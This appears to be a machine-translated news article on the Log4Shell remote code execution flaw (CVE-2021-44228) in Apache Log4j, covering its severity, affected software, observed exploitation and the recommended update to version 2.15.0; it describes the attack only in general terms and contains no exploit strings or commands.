Apache Software Foundation has published solutions to contain a actively exploited zero-day vulnerability which affects Apache Log4j. Based on Java, it is a widely used registry library, which could be used as a weapon to execute malicious code and allow a complete take over of vulnerable systems.
Labeled CVE-2021-44228, known by nicknames like “Log4Shell” or “LogJam” and discovered by Alibaba’s security team, the issue concerns a case of remote code execution Unauthenticated (RCE) in any application that uses this open source utility and affects unpatched versions of Apache Log4j 2.0-beta9 through 2.14. 1. The error was qualified with the Maximum score of 10 out of 10 on the CVSS rating system, which indicates the enormous severity of the problem.
Exploitation can be accomplished by a single text string, which can cause an application to communicate with a malicious external host if it registers through the vulnerable instance of Log4j, giving the attacker the ability to retrieve a payload. from a remote server and run it locally.
From the Apache Foundation it is recommended update systems as soon as possible with the new version 2.15.0, which fixes the bug by disabling the ability of an attacker who in previous versions could control log messages or log parameters by executing arbitrary code loaded from LDAP servers when search message substitution was enabled. This behavior is the one that has been disabled by default.
Log4Shell in Apache Log4j
«The Apache Log4j zero-day vulnerability is probably the most critical vulnerability we’ve seen this year«Explains Bharat Jogi from Qualys’s cybersecurity department. «Log4j is a ubiquitous library used by millions of Java applications to log error messages. This vulnerability is trivial to exploit«.
And it is that Log4j is used as a registration package in a variety of popular software from multiple manufacturers, including Amazon, Apple iCloud, Cisco, Cloudflare, ElasticSearch, Red Hat, Steam, Tesla, Twitter or even video games like Minecraft. In this case, the attackers have been able to remotely execute malicious code simply by pasting a specially crafted message into the chat box.
Large cybersecurity firms such as BitDefender or Cisco Talos have confirmed evidence of massive scanning of affected applications in search of vulnerable servers and registered attacks against their honeypot networks using a proof-of-concept exploit. And they warn: «This is a low-skill attack that is extremely simple to execute.«.
Given its enormous danger, the ease of exploitation and the prevalence of this library in enterprise IT services and DevOps, attacks targeting susceptible servers are expected to increase in the coming days, therefore it is imperative to address the failure immediately.
The Israeli cybersecurity firm Cybereason has also launched a solution called »Logout4Shell» that fixes the flaw by using the vulnerability itself to reconfigure the logger and prevent further exploitation of the attack. But in all cases it is recommended to update to the latest version of Apache Log4j.